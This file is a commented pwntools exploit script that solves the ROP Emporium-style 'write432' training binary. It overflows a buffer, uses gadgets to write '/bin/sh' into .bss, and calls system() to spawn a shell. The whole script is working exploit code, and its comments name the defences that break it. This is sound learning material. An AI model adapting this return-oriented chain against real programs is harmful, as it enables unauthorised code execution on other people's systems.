write432
#!/usr/bin/env python
# pwntools exploit-development library; the wildcard import is the library's
# own convention (it brings in process, p32, context, ...).
from pwn import *
# Tell pwntools the target is 32-bit Linux so p32()/process() use i386 defaults
# (word size, endianness).
context(os="linux", arch="i386")
def main():
    """Build and deliver a ROP chain to the local ./write432 binary.

    Appears to target the "write432" training binary (ROP Emporium style):
    every address below is hard-coded, so the chain only fits this exact
    build and presumes a non-PIE binary with no stack canary. The same
    properties are what defenders remove to break it: a stack protector
    trips on the saved-return-address overwrite, PIE/ASLR invalidates the
    fixed gadget and .bss addresses, and bounding the original read removes
    the overflow altogether.

    Side effects: spawns ./write432, prints its banner, sends the payload and
    hands the pwntools tube over to the user (interactive()).
    """
    conn = process('./write432')
    # Author-resolved addresses; none are verified by this script.
    system = 0x08048430  # presumably the system() PLT stub -- confirm in the binary
    pop2ret = 0x080486da # pop edi; pop ebp; ret  -- loads the next two stack words
    mov_edi_ebp = 0x08048670 # mov DWORD PTR [edi],ebp  -- 4-byte write-what-where
    bss_addr = 0x0804a040 # buffer -- writable scratch area (in .bss, per the name)
    # ROP Chain
    # Two rounds of (pop2ret -> mov) each store one 4-byte word at [edi]:
    # "/bin" at bss_addr and "/sh\0" at bss_addr+4, i.e. "/bin/sh" NUL-terminated.
    payload = ''
    payload += 'A' * 44  # filler up to the saved return address (offset chosen by the author)
    payload += p32(pop2ret)
    payload += p32(bss_addr) # edi
    payload += "/bin" # ebp
    payload += p32(mov_edi_ebp)
    payload += p32(pop2ret)
    payload += p32(bss_addr + 4)  # edi: second 4-byte slot
    payload += "/sh\x00"  # ebp: remainder of the string plus the terminator
    payload += p32(mov_edi_ebp)
    payload += p32(system)
    payload += "A" * 4 # padding -- stands in for system()'s return address (cdecl)
    payload += p32(bss_addr)  # system()'s single argument: the string just written
    # NOTE: Python 2 only. `print` is a statement here and the payload is a str;
    # under Python 3 p32() returns bytes and the str concatenation above fails.
    print conn.recv(100)
    conn.send(payload)
    conn.interactive()
# Script entry point; guarded so importing the file does not spawn the target.
if __name__ == "__main__":
    main()